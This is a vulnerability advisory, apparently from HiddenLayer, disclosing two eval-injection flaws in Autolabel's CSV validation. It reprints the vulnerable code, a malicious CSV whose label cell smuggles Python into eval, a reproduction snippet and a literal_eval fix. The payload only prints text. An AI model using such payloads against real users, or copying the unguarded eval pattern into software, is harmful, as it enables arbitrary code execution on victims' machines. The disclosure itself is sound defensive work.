HiddenLayer is the leading provider of Security for AI. Its security platform helps enterprises safeguard the machine learning models behind their most important products. HiddenLayer is the only company to offer turnkey security for AI that does not add unnecessary complexity to models and does not require access to raw data and algorithms. Founded by a team with deep roots in security and ML, HiddenLayer aims to protect enterprises’ AI from inference, bypass, and extraction attacks, as well as model theft. The company is backed by a group of strategic investors, including M12, Microsoft’s Venture Fund, Moore Strategic Ventures, Booz Allen Ventures, IBM Ventures, and Capital One Ventures.
September 12, 2024
Eval on CSV data allows arbitrary code execution in the ClassificationTaskValidate class
CVE Number
CVE-2024-27320
Summary
An arbitrary code execution vulnerability exists in the validate function of the ClassificationTaskValidate class in the autolabel/src/autolabel/dataset/validation.py file. Exploitation requires the victim to load a malicious CSV dataset with the optional parameter ‘validate’ set to True while using a specific configuration. Because the label value is passed to an unprotected eval call, an attacker can run arbitrary Python code on the machine on which the CSV file is loaded.
Products Impacted
This vulnerability is present in Autolabel v0.0.8 and newer.
CVSS Score: 7.8
AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code (‘Eval Injection’)
Details
To exploit this vulnerability, an attacker would create a malicious CSV file and share it as a dataset with the victim, who would load it for a classification task using Autolabel. The vulnerability exists in the validate function of the ClassificationTaskValidate class in the autolabel/src/autolabel/dataset/validation.py file (shown below).
def validate(self, value: str):
    """Validate classification
    A classification label(ground_truth) could either be a list or string
    """
    # TODO: This can be made better
    if value.startswith("[") and value.endswith("]"):
        try:
            seed_labels = eval(value)
            if not isinstance(seed_labels, list):
                raise
            unmatched_label = set(seed_labels) - self.labels_set
            if len(unmatched_label) != 0:
                raise ValueError(
                    f"labels: '{unmatched_label}' not in prompt/labels provided in config "
                )
        except SyntaxError:
            raise
    else:
        if value not in self.labels_set:
            raise ValueError(
                f"labels: '{value}' not in prompt/labels provided in config "
            )
When the user loads the malicious CSV file, the contents of the label_column value in each row are passed to the validate function of the class selected by the task_type attribute. If the value is wrapped in brackets ("[]"), it is passed to an eval call in the validate function of the ClassificationTaskValidate class in the autolabel/src/autolabel/dataset/validation.py file, allowing arbitrary code execution on the victim’s device. An example configuration and an example of a malicious CSV are shown below.
from autolabel import AutolabelDataset

config = {
    "task_name": "ToxicCommentClassification",
    "task_type": "classification",  # classification task
    "dataset": {
        "label_column": "label",
    },
    "model": {
        "provider": "openai",
        "name": "gpt-3.5-turbo"  # the model we want to use
    },
    "prompt": {
        # very simple instructions for the LLM
        "task_guidelines": "Does the provided comment contain 'toxic' language? Say toxic or not toxic.",
        "labels": [  # list of labels to choose from
            "toxic",
            "not toxic"
        ],
        "example_template": "Text Snippet: {example}\nClassification: {label}"
    }
}

AutolabelDataset('example.csv', config, validate=True)
example_config.py
example,label
hello,[print('\n\n\ncode execution\n\n\n') for a in ['a']]
example.csv
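The core of the issue can be reproduced outside of Autolabel in a few lines of standalone Python. The sketch below is illustrative only and assumes nothing beyond the bracketed cell value reaching eval unchanged, exactly as in the validate function shown above.

# Minimal sketch of the unsafe pattern in ClassificationTaskValidate.validate.
# The string mirrors the label cell of the malicious example.csv above.
value = "[print('code execution') for a in ['a']]"

if value.startswith("[") and value.endswith("]"):
    # eval executes the attacker-controlled string as Python code
    seed_labels = eval(value)

Running this prints "code execution", confirming that any Python expression placed in the label column is executed during dataset validation.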
Eval on CSV data allows arbitrary code execution in the MLCTaskValidate class
CVE Number
CVE-2024-27321
Summary
An arbitrary code execution vulnerability exists in the validate function of the MLCTaskValidate class in the autolabel/src/autolabel/dataset/validation.py Python file. Exploitation requires the victim to load a malicious CSV dataset with the optional parameter ‘validate’ set to True while using a specific configuration. Because the label value is passed to an unprotected eval call, an attacker can run arbitrary Python code on the victim’s machine.
Products Impacted
This vulnerability is present in Autolabel v0.0.8 and newer.
CVSS Score: 7.8
AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code (‘Eval Injection’)
Details
To exploit this vulnerability, an attacker would create a malicious CSV file and share it as a dataset with the victim, who would load it for a multilabel classification task using Autolabel. The vulnerability exists in the validate function of the MLCTaskValidate class in the autolabel/src/autolabel/dataset/validation.py Python file (shown below).
def validate(self, value: str):
    if value.startswith("[") and value.endswith("]"):
        try:
            seed_labels = eval(value)
            if not isinstance(seed_labels, list):
                raise ValueError(
                    f"value: '{value}' is not a list of labels as expected"
                )
            unmatched_label = set(seed_labels) - self.labels_set
            if len(unmatched_label) != 0:
                raise ValueError(
                    f"labels: '{unmatched_label}' not in prompt/labels provided in config "
                )
        except SyntaxError:
            raise
    else:
        # TODO: split by delimiter specified in config and validate each label
        pass
When the user loads the malicious CSV file, the contents of the label_column value in each row are passed to the validate function of the class selected by the task_type attribute. If the value is wrapped in brackets ("[]"), it is passed to an eval call in the validate function of the MLCTaskValidate class in the autolabel/src/autolabel/dataset/validation.py file, allowing arbitrary code execution on the victim’s device. An example configuration and an example of a malicious CSV are shown below:
from autolabel import AutolabelDataset

config = {
    "task_name": "ToxicCommentClassification",
    "task_type": "multilabel_classification",  # multilabel classification task
    "dataset": {
        "label_column": "label",
    },
    "model": {
        "provider": "openai",
        "name": "gpt-3.5-turbo"  # the model we want to use
    },
    "prompt": {
        # very simple instructions for the LLM
        "task_guidelines": "Does the provided comment contain 'toxic' language? Say toxic or not toxic.",
        "labels": [  # list of labels to choose from
            "toxic",
            "not toxic"
        ],
        "example_template": "Text Snippet: {example}\nClassification: {label}"
    }
}

AutolabelDataset('example.csv', config, validate=True)
example_config.py
example,label
hello,[print('\n\n\ncode execution\n\n\n') for a in ['a']]
example.csv
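Both vulnerabilities stem from the same unsafe pattern, so the same class of fix applies to both validate functions. The sketch below shows one possible mitigation, not the maintainers' official patch: replacing eval with ast.literal_eval, which parses literal Python lists but refuses to evaluate arbitrary expressions such as the print payload above. The helper name parse_label_list is hypothetical and not part of Autolabel.

import ast


def parse_label_list(value: str, labels_set: set) -> list:
    """Safely parse a label cell serialized as a Python-style list
    (hypothetical helper, not part of Autolabel)."""
    try:
        # literal_eval accepts only literals (strings, numbers, lists, ...) and
        # raises ValueError or SyntaxError for anything else, including function
        # calls and comprehensions, so no attacker-supplied code is executed
        seed_labels = ast.literal_eval(value)
    except (ValueError, SyntaxError):
        raise ValueError(f"value: '{value}' is not a valid list of labels")
    if not isinstance(seed_labels, list):
        raise ValueError(f"value: '{value}' is not a list of labels as expected")
    unmatched_label = set(seed_labels) - labels_set
    if unmatched_label:
        raise ValueError(
            f"labels: '{unmatched_label}' not in prompt/labels provided in config"
        )
    return seed_labels

Until a patched release is available, users can also reduce exposure by not setting validate=True when loading CSV files from untrusted sources.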
Timeline
July 8, 2024 — Reached out to multiple administrators through their communication channel
September 6, 2024 — Final attempt to reach out to the vendor prior to the public disclosure date
September 12, 2024 — Public disclosure